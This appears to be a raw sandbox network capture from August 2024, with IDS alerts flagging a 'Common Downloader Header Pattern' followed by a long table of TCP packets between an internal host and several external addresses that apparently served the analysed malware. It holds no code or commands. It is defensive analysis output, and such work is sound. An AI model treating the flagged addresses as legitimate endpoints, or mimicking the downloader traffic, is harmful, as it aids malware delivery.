                          2024-08-27T20:03:40.339749+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 49745 | 443 | 192.168.2.6 | 188.114.97.3
                          2024-08-27T20:03:57.238554+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 49774 | 443 | 192.168.2.6 | 188.114.97.3
                          2024-08-27T20:03:48.079577+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49756 | 80 | 192.168.2.6 | 158.101.44.242
                          2024-08-27T20:03:20.034815+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49716 | 80 | 192.168.2.6 | 158.101.44.242
                          2024-08-27T20:03:49.884414+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49761 | 80 | 192.168.2.6 | 158.101.44.242
                          2024-08-27T20:03:40.985840+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49746 | 80 | 192.168.2.6 | 158.101.44.242
                          2024-08-27T20:03:51.727380+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 49766 | 443 | 192.168.2.6 | 188.114.97.3
                          2024-08-27T20:03:24.314221+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 49728 | 443 | 192.168.2.6 | 188.114.97.3
                          2024-08-27T20:03:42.776244+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 49751 | 443 | 192.168.2.6 | 188.114.97.3
                          2024-08-27T20:03:42.188993+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49750 | 80 | 192.168.2.6 | 158.101.44.242
                          2024-08-27T20:03:50.431489+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 49763 | 443 | 192.168.2.6 | 188.114.97.3
                          2024-08-27T20:03:46.876469+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49756 | 80 | 192.168.2.6 | 158.101.44.242
                          2024-08-27T20:03:23.563943+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49727 | 80 | 192.168.2.6 | 158.101.44.242
                          2024-08-27T20:03:46.548131+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 49755 | 443 | 192.168.2.6 | 188.114.97.3
                          2024-08-27T20:03:20.617307+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 49721 | 443 | 192.168.2.6 | 188.114.97.3
                          2024-08-27T20:03:22.289776+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 49725 | 443 | 192.168.2.6 | 188.114.97.3
                          2024-08-27T20:03:29.195692+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 49736 | 443 | 192.168.2.6 | 188.114.97.3
                          2024-08-27T20:03:38.688943+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49742 | 80 | 192.168.2.6 | 158.101.44.242
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Aug 27, 2024 20:03:16.914062023 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.914206982 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.914218903 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.914232016 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.914253950 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.914932966 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.914948940 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.914971113 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.914995909 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.915045023 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.915688038 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.915699959 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.915730953 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.915752888 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.916594028 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.916606903 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.916704893 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.917017937 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.917030096 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.917131901 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.917464972 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.917476892 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.917488098 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.917557955 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.917557955 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.918320894 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.918349028 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.918360949 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.918489933 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:16.918983936 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.919001102 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.919012070 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:16.919348001 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.004816055 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.016016006 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.021936893 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.233051062 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.233076096 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.233088017 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.233324051 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.233937979 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.233951092 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.233961105 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.233972073 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.234050989 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.234050989 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.234683037 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.234694958 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.234704971 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.234723091 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.234735012 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.234761000 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.235616922 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.235630035 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.235640049 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.235647917 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.235652924 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.235673904 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.236468077 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.236485958 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.236499071 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.236500025 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.236511946 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.236536026 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.237351894 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.237364054 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.237374067 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.237377882 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.237387896 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.237407923 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.238441944 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.238455057 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.238468885 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.238472939 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.238481998 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.238492966 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.238502979 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.238799095 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.239080906 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.239103079 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.239115000 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.239125967 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.239156008 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.240214109 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.240232944 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.240243912 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.240246058 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.240263939 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.240276098 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.240295887 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.240295887 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.241118908 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241136074 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241147041 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.241147995 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241163015 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241174936 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.241592884 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241607904 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241619110 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241619110 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.241631031 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241641998 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.241648912 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.241669893 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.242160082 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.242177010 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.242187977 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.242199898 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.242798090 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.243077040 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.243755102 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.244096994 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.244122982 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.250802040 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.324567080 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.324651957 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.324665070 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.326811075 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.332683086 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.332837105 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.332849979 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.333177090 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.333190918 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.333204031 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.333524942 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.333537102 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.333549023 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.333549976 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.333565950 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.333571911 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.334254980 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.334268093 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.334285021 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.334575891 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.334589005 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.334595919 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.334602118 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.334614038 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.334625006 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.334635973 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.334642887 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.334682941 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.334682941 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.335452080 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.335465908 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.335475922 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.335488081 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.335500956 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.335511923 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.335522890 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.335567951 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.335567951 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.336355925 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.336368084 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.336376905 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.336390972 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.336402893 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.336426020 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.336426020 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.337269068 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.337282896 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.337292910 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.337304115 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.337321043 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.337342978 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.338159084 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.338171959 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.338181973 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.338186979 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.338195086 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.338208914 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.338221073 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.339262009 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.339277029 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.339287996 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.339288950 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.339301109 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.339312077 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.339314938 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.339349985 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.339349985 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.340065002 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.340080023 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.340091944 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.340102911 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.340128899 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.340796947 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.340898037 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.340910912 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.340925932 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.340938091 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.340948105 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.340956926 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.341834068 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.341849089 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.341859102 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.341870070 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.341872931 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.341893911 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.342737913 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.342752934 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.342762947 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.342777014 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.342791080 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.342804909 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.342839003 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.342839003 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.343632936 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.343646049 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.343657017 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.343667984 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.343699932 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.344779968 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.344798088 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.344801903 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.345074892 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.455646038 CEST8049716158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:17.501424074 CEST4971680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:17.510931015 CEST49717443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:17.510958910 CEST44349717188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:17.511070967 CEST49717443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:17.520203114 CEST49717443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:17.520217896 CEST44349717188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:17.758409977 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.758697987 CEST4971880192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.763890982 CEST8049718144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.764669895 CEST8049715144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.764770985 CEST4971580192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.764951944 CEST4971880192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.764951944 CEST4971880192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:17.770447969 CEST8049718144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:17.990123034 CEST44349717188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:17.990257978 CEST49717443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:18.091852903 CEST49717443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:18.091881990 CEST44349717188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:18.092327118 CEST44349717188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:18.142086983 CEST49717443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:18.409110069 CEST8049718144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:18.454543114 CEST4971880192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:18.512171030 CEST4971880192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:18.517313004 CEST8049718144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:18.523710012 CEST49717443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:18.564492941 CEST44349717188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:18.639966965 CEST44349717188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:18.640064001 CEST44349717188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:18.640119076 CEST49717443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:18.648472071 CEST49717443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:18.652951002 CEST4971680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:18.658663034 CEST8049716158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:18.705929995 CEST8049718144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:18.705961943 CEST8049718144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:18.705975056 CEST8049718144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:18.706012964 CEST4971880192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:18.706423044 CEST8049718144.91.79.54192.168.2.6
                          Aug 27, 2024 20:03:18.706466913 CEST4971880192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:19.425234079 CEST4971880192.168.2.6144.91.79.54
                          Aug 27, 2024 20:03:19.989769936 CEST8049716158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:19.994585037 CEST49721443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:19.994642973 CEST44349721188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:19.995462894 CEST49721443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:19.996212006 CEST49721443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:19.996222973 CEST44349721188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:20.034815073 CEST4971680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:20.461560965 CEST44349721188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:20.464103937 CEST49721443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:20.464132071 CEST44349721188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:20.617326021 CEST44349721188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:20.617409945 CEST44349721188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:20.617855072 CEST49721443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:20.618455887 CEST49721443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:20.622802019 CEST4971680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:20.624059916 CEST4972380192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:20.628242970 CEST8049716158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:20.629259109 CEST4971680192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:20.629333973 CEST8049723158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:20.632041931 CEST4972380192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:20.632390022 CEST4972380192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:20.637553930 CEST8049723158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:21.653367996 CEST8049723158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:21.654804945 CEST49725443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:21.654843092 CEST44349725188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:21.654903889 CEST49725443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:21.655257940 CEST49725443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:21.655272007 CEST44349725188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:21.704538107 CEST4972380192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:21.862514019 CEST49707443192.168.2.6173.222.162.64
                          Aug 27, 2024 20:03:21.862597942 CEST49707443192.168.2.6173.222.162.64
                          Aug 27, 2024 20:03:21.863255978 CEST49726443192.168.2.6173.222.162.64
                          Aug 27, 2024 20:03:21.863296986 CEST44349726173.222.162.64192.168.2.6
                          Aug 27, 2024 20:03:21.863377094 CEST49726443192.168.2.6173.222.162.64
                          Aug 27, 2024 20:03:21.863971949 CEST49726443192.168.2.6173.222.162.64
                          Aug 27, 2024 20:03:21.863986015 CEST44349726173.222.162.64192.168.2.6
                          Aug 27, 2024 20:03:21.867487907 CEST44349707173.222.162.64192.168.2.6
                          Aug 27, 2024 20:03:21.868087053 CEST44349707173.222.162.64192.168.2.6
                          Aug 27, 2024 20:03:22.122481108 CEST44349725188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:22.124510050 CEST49725443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:22.124526978 CEST44349725188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:22.289805889 CEST44349725188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:49.858542919 CEST4976280192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:49.882810116 CEST8049761158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:49.884413958 CEST4976180192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:49.887845039 CEST49764443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:49.887887001 CEST44349764188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:49.887962103 CEST49764443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:49.888223886 CEST49764443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:49.888235092 CEST44349764188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:49.892096043 CEST8049761158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:49.892164946 CEST4976180192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:50.279696941 CEST44349763188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:50.311714888 CEST49763443192.168.2.6188.114.97.3
